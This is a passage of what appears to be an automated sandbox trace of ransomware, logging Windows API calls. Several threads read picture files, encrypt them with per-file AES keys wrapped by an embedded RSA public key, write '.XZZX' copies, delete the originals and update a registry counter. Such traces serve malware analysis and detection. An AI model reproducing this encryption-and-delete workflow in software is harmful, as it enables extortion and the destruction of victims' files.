f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0122.040] OutputDebugStringW (lpOutputString="end") [0122.040] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0122.040] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0122.040] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3ce1a88) returned 1 [0122.041] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce1a88, dwCertEncodingType=0x1, pInfo=0x3cb1d18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1d48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1d50*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3a5e90) returned 1 [0122.041] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0122.041] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0122.041] CryptEncrypt (in: hKey=0x3a5e90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0122.041] CryptEncrypt (in: hKey=0x3a5e90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce1b10*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce1b10*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0122.041] WriteFile (in: hFile=0x5c8, lpBuffer=0x3ce1b10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce1b10*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0122.041] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0122.041] WriteFile (in: hFile=0x5c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0122.041] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0122.042] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0122.042] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x5cc) returned 0x0 [0122.042] RegQueryValueExW (in: hKey=0x5cc, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x84, lpcbData=0x434dfdc*=0x4) returned 0x0 [0122.042] RegCloseKey (hKey=0x5cc) returned 0x0 [0122.042] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x5cc) returned 0x0 [0122.042] RegSetValueExW (in: hKey=0x5cc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x85, cbData=0x4 | out: lpData=0x434dfec*=0x85) returned 0x0 [0122.042] RegCloseKey (hKey=0x5cc) returned 0x0 [0122.042] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.042] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.043] CloseHandle (hObject=0x5c8) returned 1 [0122.044] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0122.044] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0122.045] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\azuNey.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\azuney.jpg")) returned 1 [0122.046] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\azuNey.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\azuney.jpg")) returned 0 Thread: id = 397 os_tid = 0x944 [0121.826] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.826] lstrcpyW (in: lpString1=0x420f460, lpString2="B4vC-SYblpXq.bmp" | out: lpString1="B4vC-SYblpXq.bmp") returned="B4vC-SYblpXq.bmp" [0121.826] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.826] SetErrorMode (uMode=0x1) returned 0x1 [0121.826] lstrcpyW (in: lpString1=0x420f860, lpString2="B4vC-SYblpXq.bmp" | out: lpString1="B4vC-SYblpXq.bmp") returned="B4vC-SYblpXq.bmp" [0121.826] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x38c9770b, Data2=0x321b, Data3=0x4cd9, Data4=([0]=0x84, [1]=0x54, [2]=0xb6, [3]=0x21, [4]=0x73, [5]=0x1e, [6]=0x8a, [7]=0x22))) returned 0x0 [0121.826] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B4vC-SYblpXq.bmp") returned 59 [0121.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0121.826] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\567FB4290F0A7CE338C9770B132B612B.XZZX") returned 80 [0121.826] StrStrW (lpFirst="B4vC-SYblpXq.bmp", lpSrch="XZZX") returned 0x0 [0121.826] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B4vC-SYblpXq.bmp", dwFileAttributes=0x20) returned 1 [0121.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B4vC-SYblpXq.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b4vc-syblpxq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5bc [0121.827] ReadFile (in: hFile=0x5bc, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0xb14f, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0xb14f, lpOverlapped=0x0) returned 1 [0121.829] CloseHandle (hObject=0x5bc) returned 1 [0121.829] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0121.829] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0121.830] SetErrorMode (uMode=0x1) returned 0x1 [0121.830] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0121.830] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1a00) returned 1 [0121.833] CryptGenKey (in: hProv=0x3ce1a00, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5f90) returned 1 [0122.096] CryptExportKey (in: hKey=0x3a5f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0122.096] CryptExportKey (in: hKey=0x3a5f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x420e41c | out: pbData=0x4350000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0122.096] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0122.097] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0122.097] CryptDestroyKey (hKey=0x3a5f90) returned 1 [0122.097] CryptReleaseContext (hProv=0x3ce1b98, dwFlags=0x0) returned 0 [0122.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\567FB4290F0A7CE338C9770B132B612B.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\567fb4290f0a7ce338c9770b132b612b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0122.098] WriteFile (in: hFile=0x5b0, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0xb14f, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0xb14f, lpOverlapped=0x0) returned 1 [0122.099] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb14f [0122.099] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0122.099] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb154 [0122.099] WriteFile (in: hFile=0x5b0, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x20, lpOverlapped=0x0) returned 1 [0122.099] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb174 [0122.099] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0122.099] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb179 [0122.099] SetErrorMode (uMode=0x1) returned 0x1 [0122.099] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0122.099] OutputDebugStringW (lpOutputString="end") [0122.100] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0122.100] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0122.100] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce1c20) returned 1 [0122.100] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce1c20, dwCertEncodingType=0x1, pInfo=0x3cb1de8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1e18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1e20*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5f90) returned 1 [0122.100] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0122.101] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0122.101] CryptEncrypt (in: hKey=0x3a5f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0122.101] CryptEncrypt (in: hKey=0x3a5f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce1ca8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce1ca8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0122.101] WriteFile (in: hFile=0x5b0, lpBuffer=0x3ce1ca8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce1ca8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0122.101] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0122.101] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0122.101] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0122.102] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0122.102] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5cc) returned 0x0 [0122.102] RegQueryValueExW (in: hKey=0x5cc, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x85, lpcbData=0x420dfdc*=0x4) returned 0x0 [0122.102] RegCloseKey (hKey=0x5cc) returned 0x0 [0122.102] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5cc) returned 0x0 [0122.102] RegSetValueExW (in: hKey=0x5cc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x86, cbData=0x4 | out: lpData=0x420dfec*=0x86) returned 0x0 [0122.102] RegCloseKey (hKey=0x5cc) returned 0x0 [0122.102] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.102] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.103] CloseHandle (hObject=0x5b0) returned 1 [0122.104] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0122.104] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0122.104] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B4vC-SYblpXq.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b4vc-syblpxq.bmp")) returned 1 [0122.106] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B4vC-SYblpXq.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b4vc-syblpxq.bmp")) returned 0 Thread: id = 398 os_tid = 0x948 [0122.046] lstrcpyA (in: lpString1=0x449fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.046] lstrcpyW (in: lpString1=0x449f460, lpString2="bqBGtF.bmp" | out: lpString1="bqBGtF.bmp") returned="bqBGtF.bmp" [0122.046] lstrcpyW (in: lpString1=0x449e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.046] SetErrorMode (uMode=0x1) returned 0x1 [0122.046] lstrcpyW (in: lpString1=0x449f860, lpString2="bqBGtF.bmp" | out: lpString1="bqBGtF.bmp") returned="bqBGtF.bmp" [0122.046] CoCreateGuid (in: pguid=0x449e440 | out: pguid=0x449e440*(Data1=0x389547c5, Data2=0x55d4, Data3=0x4ac2, Data4=([0]=0x82, [1]=0xf5, [2]=0x41, [3]=0x1e, [4]=0x57, [5]=0x3e, [6]=0xc6, [7]=0xd7))) returned 0x0 [0122.046] wsprintfW (in: param_1=0x449ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bqBGtF.bmp") returned 53 [0122.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x449fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0122.046] wsprintfW (in: param_1=0x449e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6C73D824191052A8389547C51D5A36F0.XZZX") returned 80 [0122.046] StrStrW (lpFirst="bqBGtF.bmp", lpSrch="XZZX") returned 0x0 [0122.047] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bqBGtF.bmp", dwFileAttributes=0x20) returned 1 [0122.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bqBGtF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bqbgtf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0122.047] ReadFile (in: hFile=0x5b0, lpBuffer=0x3ce36b8, nNumberOfBytesToRead=0x211e, lpNumberOfBytesRead=0x449e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce36b8*, lpNumberOfBytesRead=0x449e418*=0x211e, lpOverlapped=0x0) returned 1 [0122.048] CloseHandle (hObject=0x5b0) returned 1 [0122.048] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0122.049] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0122.049] SetErrorMode (uMode=0x1) returned 0x1 [0122.049] lstrcpyW (in: lpString1=0x449e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0122.049] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1b98) returned 1 [0122.052] CryptGenKey (in: hProv=0x3ce1b98, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a6090) returned 1 [0122.147] CryptExportKey (in: hKey=0x3a6090, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x449e41c | out: pbData=0x0*, pdwDataLen=0x449e41c*=0x94) returned 1 [0122.148] CryptExportKey (in: hKey=0x3a6090, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x449e41c | out: pbData=0x40a0000*, pdwDataLen=0x449e41c*=0x94) returned 1 [0122.148] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0122.148] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0122.148] CryptDestroyKey (hKey=0x3a6090) returned 1 [0122.148] CryptReleaseContext (hProv=0x3ce1b98, dwFlags=0x0) returned 0 [0122.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6C73D824191052A8389547C51D5A36F0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6c73d824191052a8389547c51d5a36f0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0122.149] WriteFile (in: hFile=0x5c0, lpBuffer=0x3ce36b8*, nNumberOfBytesToWrite=0x211e, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce36b8*, lpNumberOfBytesWritten=0x449e438*=0x211e, lpOverlapped=0x0) returned 1 [0122.150] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x211e [0122.150] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0122.150] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2123 [0122.150] WriteFile (in: hFile=0x5c0, lpBuffer=0x449f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x449f860*, lpNumberOfBytesWritten=0x449e438*=0x14, lpOverlapped=0x0) returned 1 [0122.150] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2137 [0122.150] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0122.150] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x213c [0122.151] SetErrorMode (uMode=0x1) returned 0x1 [0122.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 